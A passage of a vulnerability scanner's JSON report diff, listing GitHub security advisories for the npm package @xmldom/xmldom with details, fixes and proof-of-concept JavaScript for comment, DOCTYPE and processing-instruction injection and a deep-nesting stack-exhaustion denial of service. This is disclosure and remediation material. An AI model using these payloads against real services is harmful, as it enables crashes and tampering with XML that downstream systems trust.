"0.8.11", + "FixedVersion": "0.8.13, 0.9.10", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-41672", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:7307ca1075c073ce090122ddfc34dac830e447ab2af06088d56eeb9074fa32f4", + "Title": "xmldom has XML node injection through unvalidated comment serialization", + "Description": "## Summary\n\nThe package allows attacker-controlled comment content to be serialized into XML without validating or neutralizing comment breaking sequences. As a result, an attacker can terminate the comment early and inject arbitrary XML nodes into the serialized output.\n\n---\n\n## Details\n\nThe issue is in the DOM construction and serialization flow for comment nodes.\n\nWhen `createComment(data)` is called, the supplied string is stored as comment data through the generic character-data handling path. That content is kept as-is. Later, when the document is serialized, the serializer writes comment nodes by concatenating the XML comment delimiters with the stored `node.data` value directly.\n\nThat behavior is unsafe because XML comments are a syntax-sensitive context. If attacker-controlled input contains a sequence that closes the comment, the serializer does not preserve it as literal comment text. Instead, it emits output where the remainder of the payload is treated as live XML markup.\n\nThis is a real injection bug, not a formatting issue. The serializer already applies context-aware handling in other places, such as escaping text nodes and rewriting unsafe CDATA terminators. Comment content does not receive equivalent treatment. Because of that gap, untrusted data can break out of the comment boundary and modify the structure of the final XML document.\n\n---\n\n## PoC\n\n```js\nconst { DOMImplementation, DOMParser, XMLSerializer } = require('@xmldom/xmldom');\n\nconst doc = new DOMImplementation().createDocument(null, 'root', null);\n\ndoc.documentElement.appendChild(\n doc.createComment('--\u003e\u003cinjected attr=\"1\"/\u003e\u003c!--')\n);\n\nconst xml = new XMLSerializer().serializeToString(doc);\nconsole.log(xml);\n// \u003croot\u003e\u003c!----\u003e\u003cinjected attr=\"1\"/\u003e\u003c!----\u003e\u003c/root\u003e\n\nconst reparsed = new DOMParser().parseFromString(xml, 'text/xml');\nconsole.log(reparsed.documentElement.childNodes.item(1).nodeName);\n// injected\n```\n\n---\n\n## Impact\n\nAn application that uses the package to build XML from untrusted input can be made to emit attacker-controlled elements outside the intended comment boundary. That allows the attacker to alter the meaning and structure of generated XML documents.\n\nIn practice, this can affect any workflow that generates XML and then stores it, forwards it, signs it, or hands it to another parser. Realistic targets include XML-based configuration, policy documents, and message formats where downstream consumers trust the serialized structure.\n\n---\n\n## Disclosure\n\nThis vulnerability was publicly disclosed at 2026-04-06T11:25:07Z via [xmldom/xmldom#987](https://github.com/xmldom/xmldom/pull/987), which was subsequently closed without being merged.\n\n---\n\n## Fix Applied\n\n\u003e **⚠ Opt-in required.** Protection is not automatic. Existing serialization calls remain\n\u003e vulnerable unless `{ requireWellFormed: true }` is explicitly passed. Applications that pass\n\u003e untrusted data to `createComment()` or mutate comment nodes with untrusted input (via\n\u003e `appendData`, `insertData`, `replaceData`, `.data =`, or `.textContent =`) should audit all\n\u003e `serializeToString()` call sites and add the option.\n\n`XMLSerializer.serializeToString()` now accepts an options object as a second argument. When `{ requireWellFormed: true }` is passed, the serializer throws `InvalidStateError` before emitting a Comment node whose `.data` would produce malformed XML.\n\nOn `@xmldom/xmldom` ≥ 0.9.10, the full W3C DOM Parsing §3.2.1.4 check is applied: throws if `.data` contains `--` anywhere, ends with `-`, or contains characters outside the XML Char production.\n\nOn `@xmldom/xmldom` ≥ 0.8.13 (LTS), only the `--\u003e` injection sequence is checked. The `0.8.x` SAX parser accepts comments containing `--` (without `\u003e`), so throwing on bare `--` would break a previously-working round-trip on that branch. The `--\u003e` check is sufficient to prevent injection.\n\n### PoC — fixed path\n\n```js\nconst { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');\n\nconst doc = new DOMImplementation().createDocument(null, 'root', null);\ndoc.documentElement.appendChild(doc.createComment('--\u003e\u003cinjected attr=\"1\"/\u003e\u003c!--'));\n\n// Default (unchanged): verbatim — injection present\nconst unsafe = new XMLSerializer().serializeToString(doc);\nconsole.log(unsafe);\n// \u003croot\u003e\u003c!----\u003e\u003cinjected attr=\"1\"/\u003e\u003c!----\u003e\u003c/root\u003e\n\n// Opt-in guard: throws InvalidStateError before serializing\ntry {\n new XMLSerializer().serializeToString(doc, { requireWellFormed: true });\n} catch (e) {\n console.log(e.name, e.message);\n // InvalidStateError: The comment node data contains \"--\" or ends with \"-\" (0.9.x)\n // InvalidStateError: The comment node data contains \"--\u003e\" (0.8.x — only --\u003e is checked)\n}\n```\n\n### Why the default stays verbatim\n\nThe W3C DOM Parsing and Serialization spec §3.2.1.4 defines a `require well-formed` flag whose **default value is `false`**. With the flag unset, the spec explicitly permits serializing ill-formed comment content verbatim — this is also the behavior of browser implementations (Chrome, Firefox, Safari): `new XMLSerializer().serializeToString(doc)` produces the injection sequence without error in all major browsers.\n\nUnconditionally throwing would be a behavioral breaking change with no spec justification. The opt-in `requireWellFormed: true` flag allows applications that require injection safety to enable strict mode without breaking existing deployments.\n\n### Residual limitation\n\nThe fix operates at serialization time only. There is no creation-time check in `createComment` — the spec does not require one for comment data. Any path that leads to a Comment node with `--` in its data (`createComment`, `appendData`, `.data =`, etc.) produces a node that serializes safely only when `{ requireWellFormed: true }` is passed to `serializeToString`.", + "Severity": "HIGH", + "VendorSeverity": { + "ghsa": 3 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N", + "V40Score": 8.7 + } + }, + "References": [ + "https://github.com/xmldom/xmldom", + "https://github.com/xmldom/xmldom/commit/b397540889086da868c30c366ad5c220d1a750c7", + "https://github.com/xmldom/xmldom/commit/fda7cc313de30243fea35cada64e0bb12099c2a1", + "https://github.com/xmldom/xmldom/pull/987", + "https://github.com/xmldom/xmldom/releases/tag/0.8.13", + "https://github.com/xmldom/xmldom/releases/tag/0.9.10", + "https://github.com/xmldom/xmldom/security/advisories/GHSA-j759-j44w-7fr8" + ] + }, + { + "VulnerabilityID": "CVE-2026-41673", + "VendorIDs": [ + "GHSA-2v35-w6hq-6mfw" + ], + "PkgID": "@xmldom/xmldom@0.8.11", + "PkgName": "@xmldom/xmldom", + "PkgIdentifier": { + "PURL": "pkg:npm/%40xmldom/xmldom@0.8.11", + "UID": "df38f0b8448f89b9" + }, + "InstalledVersion": "0.8.11", + "FixedVersion": "0.8.13, 0.9.10", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-41673", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:dc7144040ebacb87c6a4442ab91b3294453ad09d7176cd1190f3b81bd509e63d", + "Title": "xmldom: Uncontrolled recursion in XML serialization leads to DoS", + "Description": "## Summary\n\nSeven recursive traversals in `lib/dom.js` operate without a depth limit. A sufficiently deeply\nnested DOM tree causes a `RangeError: Maximum call stack size exceeded`, crashing the application.\n\n**Reported operations:**\n- `Node.prototype.normalize()` — reported by @praveen-kv (email 2026-04-05) and @KarimTantawey (GHSA-fwmp-8wwc-qhv6, via `DOMParser.parseFromString()`)\n- `XMLSerializer.serializeToString()` — reported by @Jvr2022 (GHSA-2v35-w6hq-6mfw) and @KarimTantawey (GHSA-j2hf-fqwf-rrjf)\n\n**Additionally, discovered in research:**\n- `Element.getElementsByTagName()` / `getElementsByTagNameNS()` / `getElementsByClassName()` / `getElementById()`\n- `Node.cloneNode(true)`\n- `Document.importNode(node, true)`\n- `node.textContent` (getter)\n- `Node.isEqualNode(other)`\n\nAll seven share the same root cause: pure-JavaScript recursive tree traversal with no depth guard.\nA single deeply nested document (parsed successfully) triggers any or all of these operations.\n\n---\n\n## Details\n\n### Root cause\n\n`lib/dom.js` implements DOM tree traversals as depth-first recursive functions. Each level of\nelement nesting adds one JavaScript call frame. The JS engine's call stack is finite; once\nexhausted, a `RangeError: Maximum call stack size exceeded` is thrown. This error may not be\ncaught reliably at stack-exhaustion depths because the catch handler itself requires stack\nframes to execute — especially in async scenarios, where an uncaught `RangeError` inside a\ncallback or promise chain can crash the entire Node.js process.\n\nParsing a deeply nested document **succeeds** — the SAX parser in `lib/sax.js` is iterative.\nThe crash occurs during subsequent operations on the parsed DOM.\n\n### `Node.prototype.normalize()` — reported by @praveen-kv\n\n[`lib/dom.js:1296–1308`](https://github.com/xmldom/xmldom/blob/9ef2fd297ca527a05ecb11979850317a927cd20c/lib/dom.js#L1296-L1308) (main):\n\n```js\nnormalize: function () {\n var child = this.firstChild;\n while (child) {\n var next = child.nextSibling;\n if (next \u0026\u0026 next.nodeType == TEXT_NODE \u0026\u0026 child.nodeType == TEXT_NODE) {\n this.removeChild(next);\n child.appendData(next.data);\n } else {\n child.normalize(); // recursive call — no depth guard\n child = next;\n }\n }\n},\n```\n\nCrash threshold (Node.js 18, default stack): ~10,000 levels.\n\n### `XMLSerializer.serializeToString()` — reported by @Jvr2022\n\n[`lib/dom.js:2790–2974`](https://github.com/xmldom/xmldom/blob/9ef2fd297ca527a05ecb11979850317a927cd20c/lib/dom.js#L2790-L2974) (main):\nThe internal `serializeToString` worker recurses into child nodes at four call sites, each\npassing a `visibleNamespaces.slice()` copy. The per-frame allocation causes earlier stack\nexhaustion than `normalize()`.\n\nCrash threshold (Node.js 18, default stack): ~5,000 levels.\n\n### Additional recursive entry points\n\nAll five crash at ~10,000 levels on Node.js 18.\n\n| Function | Definition | Public API entry point(s) | Crash depth (Node.js 18) |\n|-----------------------------|----------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------|--------------------------|\n| `_visitNode` | [`lib/dom.js:1529`](https://github.com/xmldom/xmldom/blob/9ef2fd297ca527a05ecb11979850317a927cd20c/lib/dom.js#L1529) | `getElementsByTagName()`, `getElementsByTagNameNS()`, `getElementsByClassName()`, `getElementById()` | ~10,000 levels |\n| `cloneNode` (module fn) | [`lib/dom.js:3037`](https://github.com/xmldom/xmldom/blob/9ef2fd297ca527a05ecb11979850317a927cd20c/lib/dom.js#L3037) | `Node.prototype.cloneNode(true)` | ~10,000 levels |\n| `importNode` (module fn) | [`lib/dom.js:2975`](https://github.com/xmldom/xmldom/blob/9ef2fd297ca527a05ecb11979850317a927cd20c/lib/dom.js#L2975) | `Document.prototype.importNode(node, true)` | ~10,000 levels |\n| `getTextContent` (inner fn) | [`lib/dom.js:3130`](https://github.com/xmldom/xmldom/blob/9ef2fd297ca527a05ecb11979850317a927cd20c/lib/dom.js#L3130) | `node.textContent` (getter) | ~10,000 levels |\n| `isEqualNode` | [`lib/dom.js:1120`](https://github.com/xmldom/xmldom/blob/9ef2fd297ca527a05ecb11979850317a927cd20c/lib/dom.js#L1120) | `Node.prototype.isEqualNode(other)` | ~10,000 levels |\n\nBoth active branches (`main` and `release-0.8.x`) are identically affected. The unscoped `xmldom`\npackage (≤ 0.6.0) carries the same recursive patterns from its initial commit.\n\n### Browser behavior\n\nTested with Chromium 147 (Playwright headless). Chromium's native C++ implementations of all\nseven DOM methods are **iterative** — they traverse the DOM without consuming JS call stack frames.\nAll seven succeed at depths up to 20,000 without any crash.\n\nWhen `@xmldom/xmldom` is bundled and run in a browser context the same recursive JS code executes\nunder the browser's V8 stack limit (~12,000–13,000 frames). The crash thresholds are similar to\nthose observed on Node.js 18 (~5,000 for `serializeToString`, ~10,000 for the remaining six).\n\nThe vulnerability is specific to xmldom's pure-JavaScript recursive implementation, not an\ninherent property of the DOM operations.\n\n---\n\n## PoC\n\n### `normalize()` (from @praveen-kv report, 2026-04-05)\n\n```js\nconst { DOMParser } = require('@xmldom/xmldom');\n\nfunction generateNestedXML(depth) {\n return '\u003croot\u003e' + '\u003ca\u003e'.repeat(depth) + 'text' + '\u003c/a\u003e'.repeat(depth) + '\u003c/root\u003e';\n}\n\nconst doc = new DOMParser().parseFromString(generateNestedXML(10000), 'text/xml');\ndoc.documentElement.normalize();\n// RangeError: Maximum call stack size exceeded\n```\n\n### `XMLSerializer.serializeToString()` (from GHSA-2v35-w6hq-6mfw)\n\n```js\nconst { DOMParser, XMLSerializer } = require('@xmldom/xmldom');\n\nconst depth = 5000;\nconst xml = '\u003ca\u003e'.repeat(depth) + '\u003c/a\u003e'.repeat(depth);\nconst doc = new DOMParser().parseFromString(xml, 'text/xml');\nnew XMLSerializer().serializeToString(doc);\n// RangeError: Maximum call stack size exceeded\n```\n\nThe other methods have been verified using similar pocs.\n\n---\n\n## Impact\n\nAny service that accepts attacker-controlled XML and subsequently calls any of the seven affected\nDOM operations can be forced into a reliable denial of service with a single crafted payload.\n\nThe immediate result is an uncaught `RangeError` and failed request processing. In deployments\nwhere uncaught exceptions terminate the worker or process, the impact can extend beyond a single\nrequest and disrupt service availability more broadly.\n\nNo authentication, special options, or invalid XML is required. A valid, deeply nested XML\ndocument is enough.\n\n---\n\n## Disclosure\n\nThe `normalize()` vector was publicly disclosed at 2026-04-06T11:25:07Z via\n[xmldom/xmldom#987](https://github.com/xmldom/xmldom/pull/987) (closed without merge).\n`serializeToString()` and the five additional recursive entry points were not mentioned in that PR.\n\n---\n\n## Fix Applied\n\nAll seven affected traversals have been converted from recursive to iterative implementations, eliminating call-stack consumption on deep trees.\n\n### `walkDOM` utility\n\nA new `walkDOM(node, context, callbacks)` utility is introduced. It traverses the subtree rooted at `node` in depth-first order using an explicit JavaScript array as a stack, consuming heap memory instead of call-stack frames. `context` is an arbitrary value threaded through the walk — each `callbacks.enter(node, context)` call returns the context to pass to that node's children, enabling per-branch state (e.g. namespace snapshots in the serializer). `callbacks.exit(node, context)` (optional) is called in post-order after all children have been visited.\n\nThe following six operations are re-implemented on top of `walkDOM`:\n\n| Operation | Public entry point(s) |\n|---|---|\n| `_visitNode` helper | `getElementsByTagName()`, `getElementsByTagNameNS()`, `getElementsByClassName()`, `getElementById()` |\n| `getTextContent` inner function | `node.textContent` getter |\n| `cloneNode` module function | `Node.prototype.cloneNode(true)` |\n| `importNode` module function | `Document.prototype.importNode(node, true)` |\n| `serializeToString` worker | `XMLSerializer.prototype.serializeToString()`, `Node.prototype.toString()`, `NodeList.prototype.toString()` |\n| `normalize` | `Node.prototype.normalize()` |\n\n`normalize` uses `walkDOM` with a `null` context and an `enter` callback that merges adjacent Text children of the current node before `walkDOM` reads and queues those children — so the surviving post-merge children are what the walker descends into.\n\n### Custom iterative loop for `isEqualNode`\n\nOne function cannot use `walkDOM`:\n\n**`Node.prototype.isEqualNode(other)`** (0.9.x only; absent from 0.8.x) compares two trees in parallel. It maintains an explicit stack of `{node, other}` node pairs — one node from each tree — which cannot be expressed with `walkDOM`'s single-tree visitor.\n\n### After the fix\n\nAll seven entry points succeed on trees of arbitrary depth without throwing `RangeError`. The original PoCs still demonstrate the vulnerability on unpatched versions and confirm the fix on patched versions.", + "Severity": "HIGH", + "VendorSeverity": { + "ghsa": 3 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", + "V40Score": 8.7 + } + }, + "References": [ + "https://github.com/xmldom/xmldom", + "https://github.com/xmldom/xmldom/commit/17678a2a73ecbd1a2da90f3d47dc23da9cef81aa", + "https://github.com/xmldom/xmldom/commit/291257493cb0eb6980eda83b162a9c4e6d7d2597", + "https://github.com/xmldom/xmldom/commit/2d6d6916ed8a4c223db1f6d7560ab4544c465b0f", + "https://github.com/xmldom/xmldom/commit/430357c7b6333108856e917bf2367afe5ceb6f8a", + "https://github.com/xmldom/xmldom/commit/4845ef109221df0890825de2822fbe77afba3afe", + "https://github.com/xmldom/xmldom/commit/8834218c85ac2a4d757b9587c9028e67c2f7b6c3", + "https://github.com/xmldom/xmldom/commit/8b7cfd1491314abdc347261921d7334ff15f7112", + "https://github.com/xmldom/xmldom/commit/b0620383abc1df067f3ce1014c43ae1bc1161eeb", + "https://github.com/xmldom/xmldom/commit/e6edcab6bef5bcdba0b220bb35442aa72f452b84", + "https://github.com/xmldom/xmldom/releases/tag/0.8.13", + "https://github.com/xmldom/xmldom/releases/tag/0.9.10", + "https://github.com/xmldom/xmldom/security/advisories/GHSA-2v35-w6hq-6mfw" + ] + }, + { + "VulnerabilityID": "CVE-2026-41674", + "VendorIDs": [ + "GHSA-f6ww-3ggp-fr8h" + ], + "PkgID": "@xmldom/xmldom@0.8.11", + "PkgName": "@xmldom/xmldom", + "PkgIdentifier": { + "PURL": "pkg:npm/%40xmldom/xmldom@0.8.11", + "UID": "df38f0b8448f89b9" + }, + "InstalledVersion": "0.8.11", + "FixedVersion": "0.8.13, 0.9.10", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-41674", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:fc50e1e35dd65f5be8c89601e405570ce7b09d9658517658355ccfee71754d1d", + "Title": "xmldom has XML injection through unvalidated DocumentType serialization", + "Description": "## Summary\n\nThe package serializes `DocumentType` node fields (`internalSubset`, `publicId`, `systemId`) verbatim\nwithout any escaping or validation. When these fields are set programmatically to attacker-controlled\nstrings, `XMLSerializer.serializeToString` can produce output where the DOCTYPE declaration is\nterminated early and arbitrary markup appears outside it.\n\n---\n\n## Details\n\n`DOMImplementation.createDocumentType(qualifiedName, publicId, systemId, internalSubset)` validates\nonly `qualifiedName` against the XML QName production. The remaining three arguments are stored\nas-is with no validation.\n\nThe XMLSerializer emits `DocumentType` nodes as:\n\n```\n\u003c!DOCTYPE name[ PUBLIC pubid][ SYSTEM sysid][ [internalSubset]]\u003e\n```\n\nAll fields are pushed into the output buffer verbatim — no escaping, no quoting added.\n\n**`internalSubset` injection:** The serializer wraps `internalSubset` with ` [` and `]`. A value\ncontaining `]\u003e` closes the internal subset and the DOCTYPE declaration at the injection point.\nAny content after `]\u003e` in `internalSubset` appears outside the DOCTYPE in the serialized output as\nraw XML markup. Reported by @TharVid (GHSA-f6ww-3ggp-fr8h). Affected: `@xmldom/xmldom` ≥ 0.9.0\nvia `createDocumentType` API; 0.8.x only via direct property write.\n\n**`publicId` injection:** The serializer emits `publicId` verbatim after `PUBLIC` with no\nquoting added. A value containing an injected system identifier (e.g.,\n`\"pubid\" SYSTEM \"evil\"`) breaks the intended quoting context, injecting a fake SYSTEM entry\ninto the serialized DOCTYPE declaration. Identified during internal security research. Affected:\nboth branches, all versions back to 0.1.0.\n\n**`systemId` injection:** The serializer emits `systemId` verbatim. A value containing `\u003e`\nterminates the DOCTYPE declaration early; content after `\u003e` appears as raw XML markup outside\nthe DOCTYPE context. Identified during internal security research. Affected: both branches, all\nversions back to 0.1.0.\n\nThe parse path is safe: the SAX parser enforces the `PubidLiteral` and `SystemLiteral` grammar\nproductions, which exclude the relevant characters, and the internal subset parser only accepts a\nsubset it can structurally validate. The vulnerability is reachable only through programmatic\n`createDocumentType` calls with attacker-controlled arguments.\n\n---\n\n## Affected code\n\n**`lib/dom.js` — `createDocumentType` (lines 898–910):**\n\n```js\ncreateDocumentType: function (qualifiedName, publicId, systemId, internalSubset) {\n validateQualifiedName(qualifiedName); // only qualifiedName is validated\n var node = new DocumentType(PDC);\n node.name = qualifiedName;\n node.nodeName = qualifiedName;\n node.publicId = publicId || ''; // stored verbatim\n node.systemId = systemId || ''; // stored verbatim\n node.internalSubset = internalSubset || ''; // stored verbatim\n node.childNodes = new NodeList();\n return node;\n},\n```\n\n**`lib/dom.js` — serializer DOCTYPE case (lines 2948–2964):**\n\n```js\ncase DOCUMENT_TYPE_NODE:\n var pubid = node.publicId;\n var sysid = node.systemId;\n buf.push(g.DOCTYPE_DECL_START, ' ', node.name);\n if (pubid) {\n buf.push(' ', g.PUBLIC, ' ', pubid);\n if (sysid \u0026\u0026 sysid !== '.') {\n buf.push(' ', sysid);\n }\n } else if (sysid \u0026\u0026 sysid !== '.') {\n buf.push(' ', g.SYSTEM, ' ', sysid);\n }\n if (node.internalSubset) {\n buf.push(' [', node.internalSubset, ']'); // internalSubset emitted verbatim\n }\n buf.push('\u003e');\n return;\n```\n\n---\n\n## PoC\n\n### internalSubset injection\n\n```js\nconst { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');\n\nconst impl = new DOMImplementation();\nconst doctype = impl.createDocumentType(\n 'root',\n '',\n '',\n ']\u003e\u003cinjected/\u003e\u003c![CDATA['\n);\nconst doc = impl.createDocument(null, 'root', doctype);\nconst xml = new XMLSerializer().serializeToString(doc);\nconsole.log(xml);\n// \u003c!DOCTYPE root []\u003e\u003cinjected/\u003e\u003c![CDATA[]\u003e\u003croot/\u003e\n// ^^^^^^^^^^ injected element outside DOCTYPE\n```\n\n### publicId quoting context break\n\n```js\nconst { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');\n\nconst impl = new DOMImplementation();\nconst doctype = impl.createDocumentType(\n 'root',\n '\"injected PUBLIC_ID\" SYSTEM \"evil\"',\n '',\n ''\n);\nconst doc = impl.createDocument(null, 'root', doctype);\nconsole.log(new XMLSerializer().serializeToString(doc));\n// \u003c!DOCTYPE root PUBLIC \"injected PUBLIC_ID\" SYSTEM \"evil\"\u003e\u003croot/\u003e\n// quoting context broken — SYSTEM entry injected\n```\n\n### systemId injection\n\n```js\nconst { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');\n\nconst impl = new DOMImplementation();\nconst doctype = impl.createDocumentType(\n 'root',\n '',\n '\"sysid\"\u003e\u003cinjected attr=\"pwn\"/\u003e',\n ''\n);\nconst doc = impl.createDocument(null, 'root', doctype);\nconsole.log(new XMLSerializer().serializeToString(doc));\n// \u003c!DOCTYPE root SYSTEM \"sysid\"\u003e\u003cinjected attr=\"pwn\"/\u003e\u003e\u003croot/\u003e\n// \u003e in sysid closes DOCTYPE early; \u003cinjected/\u003e appears as sibling element\n```\n\n---\n\n## Impact\n\nAn application that programmatically constructs `DocumentType` nodes from user-controlled data and\nthen serializes the document can emit a DOCTYPE declaration where the internal subset is closed\nearly or where injected SYSTEM entities or other declarations appear in the serialized output.\n\nDownstream XML parsers that re-parse the serialized output and expand entities from the injected\nDOCTYPE declarations may be susceptible to XXE-class attacks if they enable entity expansion.\n\n---\n\n## Fix Applied\n\n\u003e **⚠ Opt-in required.** Protection is not automatic. Existing serialization calls remain\n\u003e vulnerable unless `{ requireWellFormed: true }` is explicitly passed. Applications that pass\n\u003e untrusted data to `createDocumentType()` or write untrusted values directly to a\n\u003e `DocumentType` node's `publicId`, `systemId`, or `internalSubset` properties should audit\n\u003e all `serializeToString()` call sites and add the option.\n\n`XMLSerializer.serializeToString()` now accepts an options object as a second argument. When `{ requireWellFormed: true }` is passed, the serializer validates the `DocumentType` node's `publicId`, `systemId`, and `internalSubset` fields before emitting the DOCTYPE declaration and throws `InvalidStateError` if any field contains an injection sequence:\n\n- **`publicId`**: throws if non-empty and does not match the XML `PubidLiteral` production (XML 1.0 [12])\n- **`systemId`**: throws if non-empty and does not match the XML `SystemLiteral` production (XML 1.0 [11])\n- **`internalSubset`**: throws if it contains `]\u003e` (which closes the internal subset and DOCTYPE declaration early)\n\nAll three checks apply regardless of how the invalid value entered the node — whether via `createDocumentType` arguments or a subsequent direct property write.\n\n### PoC — fixed path\n\n```js\nconst { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');\nconst impl = new DOMImplementation();\n\n// internalSubset injection\nconst dt1 = impl.createDocumentType('root', '', '', ']\u003e\u003cinjected/\u003e\u003c![CDATA[');\nconst doc1 = impl.createDocument(null, 'root', dt1);\n\n// Default (unchanged): verbatim — injection present\nconsole.log(new XMLSerializer().serializeToString(doc1));\n// \u003c!DOCTYPE root []\u003e\u003cinjected/\u003e\u003c![CDATA[]\u003e\u003croot/\u003e\n\n// Opt-in guard: throws InvalidStateError\ntry {\n new XMLSerializer().serializeToString(doc1, { requireWellFormed: true });\n} catch (e) {\n console.log(e.name, e.message);\n // InvalidStateError: DocumentType internalSubset contains \"]\u003e\"\n}\n```\n\nThe guard also covers post-creation property writes:\n\n```js\nconst dt2 = impl.createDocumentType('root', '', '');\ndt2.systemId = '\"sysid\"\u003e\u003cinjected attr=\"pwn\"/\u003e';\nconst doc2 = impl.createDocument(null, 'root', dt2);\nnew XMLSerializer().serializeToString(doc2, { requireWellFormed: true });\n// InvalidStateError: DocumentType systemId is not a valid SystemLiteral\n```\n\n### Why the default stays verbatim\n\nThe W3C DOM Parsing and Serialization spec §3.2.1.3 defines a `require well-formed` flag whose **default value is `false`**. With the flag unset, the spec permits verbatim serialization of DOCTYPE fields. Unconditionally throwing would be a behavioral breaking change with no spec justification. The opt-in `requireWellFormed: true` flag allows applications that require injection safety to enable strict mode without breaking existing deployments.\n\n### Residual limitation\n\n`createDocumentType(qualifiedName, publicId, systemId[, internalSubset])` does not validate `publicId`, `systemId`, or `internalSubset` at creation time. This creation-time validation is a breaking change and is deferred to a future breaking release.\n\nWhen the default serialization path is used (without `requireWellFormed: true`), all three fields are still emitted verbatim. Applications that do not pass `requireWellFormed: true` remain exposed.", + "Severity": "HIGH", + "VendorSeverity": { + "ghsa": 3 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N", + "V40Score": 8.7 + } + }, + "References": [ + "https://github.com/xmldom/xmldom", + "https://github.com/xmldom/xmldom/commit/372008f9ae0e20fd69f761c7b79e202598267314", + "https://github.com/xmldom/xmldom/releases/tag/0.8.13", + "https://github.com/xmldom/xmldom/releases/tag/0.9.10", + "https://github.com/xmldom/xmldom/security/advisories/GHSA-f6ww-3ggp-fr8h" + ] + }, + { + "VulnerabilityID": "CVE-2026-41675", + "VendorIDs": [ + "GHSA-x6wf-f3px-wcqx" + ], + "PkgID": "@xmldom/xmldom@0.8.11", + "PkgName": "@xmldom/xmldom", + "PkgIdentifier": { + "PURL": "pkg:npm/%40xmldom/xmldom@0.8.11", + "UID": "df38f0b8448f89b9" + }, + "InstalledVersion": "0.8.11", + "FixedVersion": "0.8.13, 0.9.10", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-41675", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:a441b647fe2791b85e544ceacc3ca3e0f2c971eb0f090e16f14acaabdddb70d0", + "Title": "xmldom has XML node injection through unvalidated processing instruction serialization", + "Description": "## Summary\n\nThe package allows attacker-controlled processing instruction data to be serialized into XML without validating or neutralizing the PI-closing sequence `?\u003e`. As a result, an attacker can terminate the processing instruction early and inject arbitrary XML nodes into the serialized output.\n\n---\n\n## Details\n\nThe issue is in the DOM construction and serialization flow for processing instruction nodes.\n\nWhen `createProcessingInstruction(target, data)` is called, the supplied `data` string is stored directly on the node without validation. Later, when the document is serialized, the serializer writes PI nodes by concatenating `\u003c?`, the target, a space, `node.data`, and `?\u003e` directly.\n\nThat behavior is unsafe because processing instructions are a syntax-sensitive context. The closing delimiter `?\u003e` terminates the PI. If attacker-controlled input contains `?\u003e`, the serializer does not preserve it as literal PI content. Instead, it emits output where the remainder of the payload is treated as live XML markup.\n\nThe same class of vulnerability was previously addressed for CDATA sections (GHSA-wh4c-j3r5-mjhp / CVE-2026-34601), where `]]\u003e` in CDATA data was handled by splitting. The serializer applies no equivalent protection to processing instruction data.\n\n---\n\n## Affected code\n\n**`lib/dom.js` — `createProcessingInstruction` (lines 2240–2246):**\n\n```js\ncreateProcessingInstruction: function (target, data) {\n var node = new ProcessingInstruction(PDC);\n node.ownerDocument = this;\n node.childNodes = new NodeList();\n node.nodeName = node.target = target;\n node.nodeValue = node.data = data;\n return node;\n},\n```\n\nNo validation is performed on `data`. Any string including `?\u003e` is stored as-is.\n\n**`lib/dom.js` — serializer PI case (line 2966):**\n\n```js\ncase PROCESSING_INSTRUCTION_NODE:\n return buf.push('\u003c?', node.target, ' ', node.data, '?\u003e');\n```\n\n`node.data` is emitted verbatim. If it contains `?\u003e`, that sequence terminates the PI in the output\nstream and the remainder appears as active XML markup.\n\n**Contrast — CDATA (line 2945, patched):**\n\n```js\ncase CDATA_SECTION_NODE:\n return buf.push(g.CDATA_START, node.data.replace(/]]\u003e/g, ']]]]\u003e\u003c![CDATA[\u003e'), g.CDATA_END);\n```\n\n---\n\n## PoC\n\n### Minimal (from @tlsbollei report, 2026-04-01)\n\n```js\nconst { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');\n\nconst doc = new DOMImplementation().createDocument(null, 'r', null);\ndoc.documentElement.appendChild(\n doc.createProcessingInstruction('a', '?\u003e\u003cz/\u003e\u003c?q ')\n);\nconsole.log(new XMLSerializer().serializeToString(doc));\n// \u003cr\u003e\u003c?a ?\u003e\u003cz/\u003e\u003c?q ?\u003e\u003c/r\u003e\n// ^^^^ injected \u003cz/\u003e element is active markup\n```\n\n### With re-parse verification (from @tlsbollei report)\n\n```js\nconst assert = require('assert');\nconst { DOMParser, XMLSerializer } = require('@xmldom/xmldom');\n\nconst doc = new DOMParser().parseFromString('\u003cr/\u003e', 'application/xml');\ndoc.documentElement.appendChild(doc.createProcessingInstruction('a', '?\u003e\u003cz/\u003e\u003c?q '));\nconst xml = new XMLSerializer().serializeToString(doc);\nassert.strictEqual(new DOMParser().parseFromString(xml, 'application/xml')\n .getElementsByTagName('z').length, 1); // passes — z is a real element\n```\n\n---\n\n## Impact\n\nAn application that uses the package to build XML from untrusted input can be made to emit attacker-controlled elements outside the intended PI 